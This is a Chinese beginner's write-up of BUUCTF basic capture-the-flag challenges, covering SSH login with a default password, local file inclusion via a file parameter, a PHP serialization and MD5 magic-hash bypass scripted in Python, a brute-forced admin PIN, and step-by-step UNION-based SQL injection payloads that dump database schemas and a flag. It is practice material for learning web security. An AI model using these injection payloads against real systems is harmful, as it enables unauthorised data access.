BUUCTF初学解题记录——Basic篇

目录

  • Linux Lab
  • BUU LFI COURSE 1
  • Upload-Labs-Linux
  • BUU CODE REVIEW 1
  • BUU BRUTE 1
  • sqli-labs
    • Less-1
  • 未完待续。。。

Linux Lab

# 地址和端口为示例,需要更改为动态分配后的地址和端口
ssh [email protected] -p 233
# 输入默认密码123456
cat /flag.txt
# 输出flag:
# flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2}
# 一开始以为只要大括号的内容就行了。。。结果发现要带上flag和大括号提交。。。

BUU LFI COURSE 1

访问给的地址,在地址栏最后加上?file=/flag,形如http://e62a5eef-xxxx-xxxx-xxxx-3a705b9cd797.node2333.buuoj.cn/?file=/flag,即可得到结果

Upload-Labs-Linux

这个看上去挺复杂的,先放着吧。。。

BUU CODE REVIEW 1

首先到http://c.runoob.com/compile/1运行下列代码


class BUU {
	public $correct="";
	public $input="";
}
$obj = new BUU();
$obj->input = $obj->correct;
echo serialize($obj);
?>

得到类似于如下结果

O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

接着运行如下python脚本(先修改url,但?pleaseget=1这部分别删了),用浏览器打开生成的html文件即可看到flag(或者也可以用postman等工具实现)

#!/usr/bin/env python
import requests

with requests.post(url="http://c934396b-xxxx-xxxx-xxxx-62bbeee14c98.node3.buuoj.cn/?pleaseget=1",
                   data={
                       "pleasepost": "2",
                       "md51": "QNKCDZO",
                       "md52": "240610708",
                       "obj": """O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}"""
                   }
                   ) as req:
    print(req.text)
    with open("BUU CODE REVIEW 1.html", "w", encoding=req.apparent_encoding) as f:
        f.write(req.text)

BUU BRUTE 1

用户名	admin
密码	6490
即可得到flag

sqli-labs

Less-1

  1. 参考地址
  2. ?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
  1. ?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Your Login name:2
Your Password:challenges,ctftraining,information_schema,mysql,performance_schema,security,test
  1. ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+
Your Login name:2
Your Password:flag,news,users
  1. ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+
Your Login name:2
Your Password:flag
  1. ?id=0' union select 1,2,group_concat(flag) from ctftraining.flag--+
Your Login name:2
Your Password:flag{6ede70a6-xxxx-xxxx-xxxx-169b7d270d99}

未完待续。。。

你可能感兴趣的:(记录,web,安全)